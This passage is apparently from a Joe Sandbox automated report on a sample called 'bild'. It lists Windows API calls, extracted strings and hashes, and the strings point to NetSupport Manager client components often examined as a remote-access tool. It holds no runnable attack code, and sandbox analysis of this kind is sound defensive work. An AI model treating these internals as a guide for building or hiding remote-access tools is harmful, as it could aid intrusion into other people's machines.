                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc$Version_memset
                                                                                                      • String ID: KERNEL32.DLL$Terminal Server$VerSetConditionMask$VerifyVersionInfoA$ntdll.dll
                                                                                                      • API String ID: 1659045089-3162170060
                                                                                                      • Opcode ID: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                                      • Instruction ID: 0c0b10a14524f440857339b23279ac9494b8b75ce88d62c7832b422cfd240681
                                                                                                      • Opcode Fuzzy Hash: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                                      • Instruction Fuzzy Hash: CB216A70F10329ABF720AB71AD44F5AFFA99B8871AF000474E914A7189EA71B9048765
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 1103910C
                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 11039113
                                                                                                      • _memset.LIBCMT ref: 11039131
                                                                                                      • GetDlgItemTextA.USER32(?,0000044D,?,00000080), ref: 11039183
                                                                                                      • GetDlgItemTextA.USER32(?,0000044F,00000000,00000080), ref: 110391EB
                                                                                                      • GetDlgItemTextA.USER32(?,000004BE,00000000,00000080), ref: 1103924E
                                                                                                      • GetDlgItemTextA.USER32(?,000017EC,00000000,00000080), ref: 110392B1
                                                                                                      • GetDlgItemTextA.USER32(?,0000048E,00000000,00000080), ref: 11039377
                                                                                                      • GetDlgItemTextA.USER32(?,0000048D,00000000,00000080), ref: 11039314
                                                                                                        • Part of subcall function 11142800: _strncpy.LIBCMT ref: 11142824
                                                                                                        • Part of subcall function 11142290: _strncpy.LIBCMT ref: 111422D2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Item$Text$_strncpy$EnabledWindow_memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3085755443-3916222277
                                                                                                      • Opcode ID: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                                      • Instruction ID: 27c08bceae7d385fa57d2e1d5dbc2d5db1b5a631922e4fecc43e69d3347e8bff
                                                                                                      • Opcode Fuzzy Hash: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                                      • Instruction Fuzzy Hash: 6D819F75A10706ABE724DB74CC85F9AB3F9BF84704F50C598E2499B181DF71FA448BA0
                                                                                                      APIs
                                                                                                      • wsprintfA.USER32 ref: 1106F397
                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F3E8
                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F408
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeavewsprintf
                                                                                                      • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                                                      • API String ID: 3005300677-3496508882
                                                                                                      • Opcode ID: 39a7049b07ce781649e512e0e1065f178741ae477e8da126b9dd4c2485176ebe
                                                                                                      • Instruction ID: 2680b2d19a9bdf8eb0956d8c99ae1cac6e929f7b4449284ea49473897193c40b
                                                                                                      • Opcode Fuzzy Hash: 39a7049b07ce781649e512e0e1065f178741ae477e8da126b9dd4c2485176ebe
                                                                                                      • Instruction Fuzzy Hash: 9EB1A375E0022A9FDB14DF65CC50FAAB7B9AF49708F4041DCE909A7241EB71A981CF62
                                                                                                      APIs
                                                                                                      • IsWindow.USER32(?), ref: 11047211
                                                                                                      • _malloc.LIBCMT ref: 110472AD
                                                                                                      • _memmove.LIBCMT ref: 11047312
                                                                                                      • SendMessageTimeoutA.USER32(?,0000004A,00020456,00000005,00000002,00002710,?), ref: 11047372
                                                                                                      • _free.LIBCMT ref: 11047379
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                        • Part of subcall function 11043870: _free.LIBCMT ref: 11043907
                                                                                                        • Part of subcall function 11043870: _free.LIBCMT ref: 11043927
                                                                                                        • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043955
                                                                                                        • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043992
                                                                                                        • Part of subcall function 11043870: _malloc.LIBCMT ref: 110439CC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _free$Message_malloc_strncpy$ErrorExitLastProcessSendTimeoutWindow_memmovewsprintf
                                                                                                      • String ID: IsA()$SurveyResults$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                      • API String ID: 3960737985-1318765656
                                                                                                      • Opcode ID: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                                      • Instruction ID: e7dd2455d00588b8b0596ee18c4208b20e6f9302996f578dcf6f33cfb97cf12a
                                                                                                      • Opcode Fuzzy Hash: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                                      • Instruction Fuzzy Hash: 18C1A374E0064A9FDB04DFE4C8D0EEEF7B5BF88308F208168D519AB295DB70A945CB90
                                                                                                      APIs
                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 1102D1C0
                                                                                                        • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
                                                                                                        • Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
                                                                                                        • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E
                                                                                                      • _memmove.LIBCMT ref: 1102D24A
                                                                                                      • _memmove.LIBCMT ref: 1102D26E
                                                                                                      • _memmove.LIBCMT ref: 1102D2A8
                                                                                                      • _memmove.LIBCMT ref: 1102D2C4
                                                                                                      • std::exception::exception.LIBCMT ref: 1102D30E
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 1102D323
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                      • String ID: deque<T> too long
                                                                                                      • API String ID: 827257264-309773918
                                                                                                      • Opcode ID: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                                      • Instruction ID: ae58a47b93f5c67beecf59276473b3909c5d487f19c470db74dff325715f4f31
                                                                                                      • Opcode Fuzzy Hash: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                                      • Instruction Fuzzy Hash: DD41A476E00105ABDB04CE68CC81AEEB7FAAF94324F59C669DC09DB344E675EE05C790
                                                                                                      APIs
                                                                                                      • GetMenuItemCount.USER32(?), ref: 1100519E
                                                                                                      • _memset.LIBCMT ref: 110051C0
                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 110051D4
                                                                                                      • CheckMenuItem.USER32(?,00000000,00000000), ref: 11005231
                                                                                                      • EnableMenuItem.USER32(?,00000000,00000000), ref: 11005247
                                                                                                      • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005268
                                                                                                      • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005294
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 2755257978-4108050209
                                                                                                      • Opcode ID: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                                      • Instruction ID: ff6163613c0a8cbc830ef1528835912891ededd95cc8b4eaa22ca2fcf9c2cdf5
                                                                                                      • Opcode Fuzzy Hash: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                                      • Instruction Fuzzy Hash: 71318E70D11219ABEB01DFA4D885BEEBBFCEF46758F008059F951E6240E7759944CB60
                                                                                                      APIs
                                                                                                      • _memset.LIBCMT ref: 1101D1E0
                                                                                                      • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D1FA
                                                                                                      • _memset.LIBCMT ref: 1101D20A
                                                                                                      • RegisterClassExA.USER32(?), ref: 1101D24B
                                                                                                      • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11194244,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D27E
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 1101D28B
                                                                                                      • DestroyWindow.USER32(00000000), ref: 1101D292
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                                                      • String ID: NSMChatSizeWnd
                                                                                                      • API String ID: 2883038198-4119039562
                                                                                                      • Opcode ID: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                                      • Instruction ID: df00defde950c6a972f57fa33671139d82de9fa74eae4c6bde258e6239c9b3d1
                                                                                                      • Opcode Fuzzy Hash: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                                      • Instruction Fuzzy Hash: C7314DB5D0021DAFDB10DFA5DD84BEEF7B8EB44628F20012EE925B7240D735A905CB64
                                                                                                      APIs
                                                                                                      • _memset.LIBCMT ref: 1103D18F
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000125), ref: 1103D1BD
                                                                                                      • CloseHandle.KERNEL32(?), ref: 1103D25C
                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1103D26C
                                                                                                      • CloseHandle.KERNEL32(?), ref: 1103D279
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$FileModuleNameObjectSingleWait_memset
                                                                                                      • String ID: /247$" /a$RunAnnot
                                                                                                      • API String ID: 2581068044-4059077130
                                                                                                      • Opcode ID: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                                      • Instruction ID: dc76f3c11fb5ad4c0452055a60ef983052eda761819ccc7684b04031b26646f7
                                                                                                      • Opcode Fuzzy Hash: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                                      • Instruction Fuzzy Hash: 4541C030A04319AFEB11DFA4CC84FDDB7B9EB48704F1080A5E6589B284DB71E944CF90
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(00000000,11195920), ref: 1100D3A4
                                                                                                      • GetProcAddress.KERNEL32(00000000,11195910), ref: 1100D3B8
                                                                                                      • GetProcAddress.KERNEL32(00000000,11195900), ref: 1100D3CD
                                                                                                      • GetProcAddress.KERNEL32(00000000,111958F0), ref: 1100D3E1
                                                                                                      • GetProcAddress.KERNEL32(00000000,111958E4), ref: 1100D3F5
                                                                                                      • GetProcAddress.KERNEL32(00000000,111958C4), ref: 1100D40A
                                                                                                      • GetProcAddress.KERNEL32(00000000,111958A4), ref: 1100D41E
                                                                                                      • GetProcAddress.KERNEL32(00000000,11195894), ref: 1100D432
                                                                                                      • GetProcAddress.KERNEL32(00000000,11195884), ref: 1100D447
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 190572456-0
                                                                                                      • Opcode ID: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                                      • Instruction ID: 496fda0e4c6754f74ae7accc981fa1b683a1531f66a76574b420f2493807621a
                                                                                                      • Opcode Fuzzy Hash: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                                      • Instruction Fuzzy Hash: BC318A719222349FE756CBE5CCD5B7AFFE9A748B19B00417AD42083248E7B46840CF90
                                                                                                      APIs
                                                                                                      • GetStockObject.GDI32(00000007), ref: 11113167
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 11113176
                                                                                                      • SetBrushOrgEx.GDI32(?,00000000,00000000,00000000,?,11119DB4,?,00000001,00000001,00000000,1111E6D7,00000000,?,00000000), ref: 11113181
                                                                                                      • GetStockObject.GDI32(00000000), ref: 11113189
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 11113192
                                                                                                      • GetStockObject.GDI32(0000000D), ref: 11113196
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 1111319F
                                                                                                      • SelectClipRgn.GDI32(00000000,00000000), ref: 111131B3
                                                                                                      • SelectClipRgn.GDI32(?,?), ref: 111131D5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Object$Select$Stock$Clip$Brush
                                                                                                      • String ID:
                                                                                                      • API String ID: 2690518013-0
                                                                                                      • Opcode ID: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
                                                                                                      • Instruction ID: 6254f714a47a8412abfa64db40702d153c74c152478294c48941108971bda100
                                                                                                      • Opcode Fuzzy Hash: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
